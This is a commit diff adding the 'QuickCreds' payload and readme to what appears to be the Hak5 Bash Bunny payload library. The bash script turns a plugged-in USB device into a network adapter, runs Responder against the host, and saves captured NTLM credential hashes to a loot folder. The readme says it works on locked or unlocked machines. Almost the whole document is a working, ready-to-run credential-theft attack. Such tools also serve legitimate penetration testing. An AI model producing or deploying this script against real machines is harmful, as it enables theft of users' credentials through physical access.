Initial Bash Bunny Release

2025-10-29 16:58:25 +00:00 · 2017-02-28 13:23:16 -08:00
commit b63d4c3c01
295 changed files with 138834 additions and 0 deletions
--- a/payloads/library/QuickCreds/payload.txt
+++ b/payloads/library/QuickCreds/payload.txt
@@ -0,0 +1,81 @@
+#!/bin/bash
+#
+# Title:         Quick Creds
+# Author:        Hak5Darren -- Cred: Mubix
+# Version:       1.0
+#
+# Runs responder against target with specified options
+# Saves sequential logs to mass storage loot folder
+#
+# Requires responder in /pentest/responder - run tools_installer payload first
+#
+# White Blinking.....Dependencies not met. Responder not installed in /pentest
+# Red ...............Setup
+# Red Blinking.......Setup Failed. Target did not obtain IP address. Exit.
+# Amber Blinking.....Scanning
+# Green..............Finished
+# 
+# Options
+RESPONDER_OPTIONS="-w -r -d -P"
+LOOTDIR=/root/udisk/loot/quickcreds
+
+# Check for responder. If not found, blink WHITE and end.
+if [ ! -d /pentest/responder/ ]; then
+  LED R G B 100
+  exit 1
+fi
+
+# Set LED Red while setting up attack
+LED R
+
+# Use RNDIS for Windows. Mac/*nix use ECM_ETHERNET
+ATTACKMODE RNDIS_ETHERNET 
+#ATTACKMODE ECM_ETHERNET
+
+# Source bunny_helpers.sh for functions & variables TARGET_IP, TARGET_HOSTNAME
+source bunny_helpers.sh
+
+# Setup named logs in loot directory
+mkdir -p $LOOTDIR
+HOST=${TARGET_HOSTNAME}
+# If hostname is blank set it to "noname"
+[[ -z "$HOST" ]] && HOST="noname"
+COUNT=$(ls -lad $LOOTDIR/$HOST* | wc -l)
+COUNT=$((COUNT+1))
+mkdir -p $LOOTDIR/$HOST-$COUNT
+
+# As a backup also copy logs to a loot directory in /root/loot/
+mkdir -p /root/loot/quickcreds/$HOST-$COUNT
+
+# Check target IP address. If unset, blink RED and end.
+if [ -z "${TARGET_IP}" ]; then
+    LED R 100
+	exit 1
+fi
+
+# Set LED yellow, run attack
+LED G R 500
+cd /pentest/responder
+
+# Clean logs directory
+rm logs/*
+
+# Run Responder with specified options
+python Responder.py -I usb0 $RESPONDER_OPTIONS &
+
+# Wait until NTLM log is found
+until [ -f logs/*NTLM* ]
+do
+     # Ima just loop here until NTLM logs are found
+	 sleep 1
+done
+
+# copy logs to loot directory
+cp logs/* /root/loot/quickcreds/$HOST-$COUNT
+cp logs/* $LOOTDIR/$HOST-$COUNT
+
+# Sync USB disk filesystem
+sync
+
+# Light turns green - trap is clean.
+LED G
--- a/payloads/library/QuickCreds/readme.md
+++ b/payloads/library/QuickCreds/readme.md
@@ -0,0 +1,31 @@
+# QuickCreds for Bash Bunnys
+
+Author: Hak5Darren
+Version: Version 1.0
+Credit: Mubix
+
+## Description
+
+Snags credentials from locked or unlocked machines 
+Based on the attack by Mubix of Room362.com
+Implements a responder attack. Saves creds to the loot folder on the USB Disk
+Looks for *NTLM* log files
+
+## Configuration
+
+Configured for Windows by default. Swap RNDIS_ETHERNET for ECM_ETHERNET on Mac/*nix
+
+## Requirements
+
+Responder must be in /pentest/responder/
+Run the latest tools_installer payload or manually install
+
+## STATUS
+
+| LED              | Status                                |
+| ---------------- | ------------------------------------- |
+| White (blinking) | Dependencies not met                  |
+| Red              | Setup                                 |
+| Red (blinking)   | Setup Failed. Target didn't obtain IP |
+| Amber            | Responder running, waiting for creds  |
+| Green            | Finished                              |